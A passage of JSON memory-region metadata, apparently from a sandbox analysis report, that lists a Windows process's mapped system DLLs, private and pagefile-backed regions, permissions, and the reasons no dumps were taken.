], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3447", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:27.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3448", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:27.990", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_3449", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:27.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3450", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:27.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3451", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:27.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3452", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:27.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3453", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:27.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3454", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:27.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3455", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:28.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3456", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:28.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_3457", "name": "private_0x0000000000080000", "norm_filename": null, "region_type": "private_memory", "start_va": 524288, "timestamp": "00:01:28.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3458", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:28.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_3459", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:28.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3460", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:28.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787490303, "entry_point": 1787433633, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3461", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:28.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787494400, "type": "region", "version": 1 }, "end_va": 1787564031, "entry_point": 1787499264, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3462", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787494400, "timestamp": "00:01:28.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1787625472, "type": "region", "version": 1 }, "end_va": 1787678719, "entry_point": 1787630048, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3463", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787625472, "timestamp": "00:01:28.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787908095, "entry_point": 1787696085, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3464", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:28.022", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3465", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:28.022", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3466", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:28.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3467", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:28.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3468", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:28.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3469", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:28.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3470", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:28.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3471", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:28.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3472", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:28.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3473", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:28.026", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3474", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:28.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3475", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:28.027", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3476", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:28.028", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3477", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:28.028", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3478", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:28.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3479", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:28.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3480", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:28.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3481", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:28.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3482", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:28.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3483", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:28.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3484", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:28.031", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3485", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:28.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3486", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:28.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3487", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:28.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3488", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:28.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5931007, "entry_point": 0, "filename": null, "id": "region_3489", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:28.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3490", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:28.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3491", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:28.041", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3492", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:28.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3493", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:28.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 589824, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3494", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 589824, "timestamp": "00:01:28.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3495", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:28.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_3496", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:28.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_3497", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:28.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2359295, "entry_point": 0, "filename": null, "id": "region_3498", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:28.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_3499", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:01:28.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7540735, "entry_point": 0, "filename": null, "id": "region_3500", "name": "pagefile_0x00000000005b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5963776, "timestamp": "00:01:28.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 8388607, "entry_point": 7602176, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3501", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 7602176, "timestamp": "00:01:28.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10092544, "type": "region", "version": 1 }, "end_va": 10354687, "entry_point": 0, "filename": null, "id": "region_3502", "name": "private_0x00000000009a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10092544, "timestamp": "00:01:28.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 35454975, "entry_point": 0, "filename": null, "id": "region_3503", "name": "pagefile_0x0000000000dd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14483456, "timestamp": "00:01:28.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3504", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:28.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3505", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:28.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_3506", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:01:28.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 